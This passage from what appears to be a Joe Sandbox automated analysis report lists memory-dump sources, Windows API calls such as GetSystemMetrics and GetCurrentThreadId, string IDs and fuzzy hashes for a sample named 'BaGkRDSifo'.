              • Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
              • Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2475135798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.2475039606.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475261236.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475334082.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475395338.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2475479388.00000000007CD000.00000004.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_BaGkRDSifo.jbxd
              Similarity
              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
              • String ID:
              • API String ID: 3016257755-0
              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
              • Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
              • Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89
              APIs
              • GetCurrentThreadId.KERNEL32 ref: 06ADF951
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: CurrentThread
              • String ID: fXV$fXV
              • API String ID: 2882836952-1107164591
              • Opcode ID: 2f7042b56297bea9f56b274ef35ca7fa14e0b101a3d0b426270d242bf86b1ddd
              • Instruction ID: a1ac5f4d3f384874c5a8f1321b613bf4d229127b0ebf6b3e824493b7ba3cdd4e
              • Opcode Fuzzy Hash: 2f7042b56297bea9f56b274ef35ca7fa14e0b101a3d0b426270d242bf86b1ddd
              • Instruction Fuzzy Hash: CB916A71E003489FDB14EFA9D944ADEBBF5FF88310F14806AD416AB250DB34A845CFA1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: ActiveFocusWindow
              • String ID: fXV
              • API String ID: 2022189218-3172339192
              • Opcode ID: f55e937fc96472f4e8c2e25a154d1749773766cec72c5b0fe5a219216bc9d480
              • Instruction ID: d6d138d67c7e1cce29eb2369c05d471703022e5f7b2322c40e6dc4697ec5d290
              • Opcode Fuzzy Hash: f55e937fc96472f4e8c2e25a154d1749773766cec72c5b0fe5a219216bc9d480
              • Instruction Fuzzy Hash: 41714AB4E002058FDB54EFA9CA84BAEBBF5FF48200F158499E415EB252C734ED41CBA1
              APIs
              • GetSystemMetrics.USER32(00000031), ref: 06AD871E
              • GetSystemMetrics.USER32(00000032), ref: 06AD8758
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MetricsSystem
              • String ID: fXV
              • API String ID: 4116985748-3172339192
              • Opcode ID: 2d88deea0f7e0bbb4bc55c60e1fc82cb130705b1cb132683156a9b370e8ce34d
              • Instruction ID: 8a40e36108782310cd7586aaeb77e85acc2758d49e73c24cb681dd0737f5ef6b
              • Opcode Fuzzy Hash: 2d88deea0f7e0bbb4bc55c60e1fc82cb130705b1cb132683156a9b370e8ce34d
              • Instruction Fuzzy Hash: D12186B59003488FDB21DFA9C9497EEBFF4EB08314F24845AD059AB741C378A944CFA1
              APIs
              • GetSystemMetrics.USER32(0000003B), ref: 06ACE326
              • GetSystemMetrics.USER32(0000003C), ref: 06ACE360
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MetricsSystem
              • String ID: fXV
              • API String ID: 4116985748-3172339192
              • Opcode ID: b8671fe240bacff13bab05974f872f4099e2b1fd279fb8c2d58e0826ba92018d
              • Instruction ID: 6e0ef73f093379f4b5ae67f5236a4d4710eb8146b0a16c27fae957896233a81c
              • Opcode Fuzzy Hash: b8671fe240bacff13bab05974f872f4099e2b1fd279fb8c2d58e0826ba92018d
              • Instruction Fuzzy Hash: 712153B18003488FEB21DFAAD54979EFFF4AB08324F24844ED159AB350C3786944CFA5
              APIs
              • GetSystemMetrics.USER32(00000005), ref: 05A3FBCE
              • GetSystemMetrics.USER32(00000006), ref: 05A3FC08
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2490318078.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_5a30000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MetricsSystem
              • String ID: fXV
              • API String ID: 4116985748-3172339192
              • Opcode ID: e220c22c5de53019c5ff3388ccd751d3d8e998ae2e43f1ce7c31a0cff63a3ae7
              • Instruction ID: 5320825e4195b851b3e879cb23592505e81035f802f187f079f4534410174e8f
              • Opcode Fuzzy Hash: e220c22c5de53019c5ff3388ccd751d3d8e998ae2e43f1ce7c31a0cff63a3ae7
              • Instruction Fuzzy Hash: 2C2148B5C003488FDF20CF99D64979EBBF4AB08314F24840AE059A7350D378A984CFA5
              APIs
              • GetSystemMetrics.USER32(00000022), ref: 06ACE3FE
              • GetSystemMetrics.USER32(00000023), ref: 06ACE438
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491182713.0000000006AC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AC0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ac0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MetricsSystem
              • String ID: fXV
              • API String ID: 4116985748-3172339192
              • Opcode ID: 4e7cfd02d68496ba3bd136f2de848612cc7e832ae7a580ae6e08a4735a66c25d
              • Instruction ID: b1b09f66b9c3c29a1bc89a1aa6b089578252468c396c27ea5b73cbaf5688f7e2
              • Opcode Fuzzy Hash: 4e7cfd02d68496ba3bd136f2de848612cc7e832ae7a580ae6e08a4735a66c25d
              • Instruction Fuzzy Hash: CF2166B1C003488FEB21DF99D6097AEBFF4AB08314F24845ED159AB350C3795984CFA5
              APIs
              • GetSystemMetrics.USER32(00000050), ref: 06AD2B13
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MetricsSystem
              • String ID: 4'q$fXV
              • API String ID: 4116985748-2178577289
              • Opcode ID: 2601df923ed8df3ff73ba57e01455a0ab782d21801f7d23b236fcf75ddecd18c
              • Instruction ID: 33fd779572b2ab7e15ec20d1dba7c1e4c0fa51d5ed0ed8b565a9ca66e89b6739
              • Opcode Fuzzy Hash: 2601df923ed8df3ff73ba57e01455a0ab782d21801f7d23b236fcf75ddecd18c
              • Instruction Fuzzy Hash: 9D2154B0D002598FCB10DFAAD9447EEBBF4FB08320F10845AE419B7280D3346A04CFA5
              APIs
              • GetSystemMetrics.USER32(00000031), ref: 06AD871E
              • GetSystemMetrics.USER32(00000032), ref: 06AD8758
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MetricsSystem
              • String ID: fXV
              • API String ID: 4116985748-3172339192
              • Opcode ID: 22b84967a1d90360fe186f2e69872b6784a8e33bb30c03b7f04175375bd4c148
              • Instruction ID: 67d4e85265f8b6cb258ce65a765131e05c2009fcd036c998e2d1ca810a286ec1
              • Opcode Fuzzy Hash: 22b84967a1d90360fe186f2e69872b6784a8e33bb30c03b7f04175375bd4c148
              • Instruction Fuzzy Hash: 502123B59003488FDB21DF9AD5497AEBBF4AB08314F20841AD459AB250C3786984CFA5
              APIs
              • GetSystemMetrics.USER32(00000050), ref: 06AD2B13
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2491275603.0000000006AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AD0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6ad0000_BaGkRDSifo.jbxd
              Similarity
              • API ID: MetricsSystem
              • String ID: 4'q$fXV
              • API String ID: 4116985748-2178577289
              • Opcode ID: 8e3d1f15efbd7ae0220276c11fecf9a23c3c8d572f736e4c696cee467a865aa2
              • Instruction ID: 796ac13e5a2539c85b32b3da80fabbc190a6b46852492b1cfda2138b8b5bfacb
              • Opcode Fuzzy Hash: 8e3d1f15efbd7ae0220276c11fecf9a23c3c8d572f736e4c696cee467a865aa2
              • Instruction Fuzzy Hash: 292165B0C002598FCB10DFAAD9447EEBBF4FB08320F10845AD419B7280D3346A04CFA5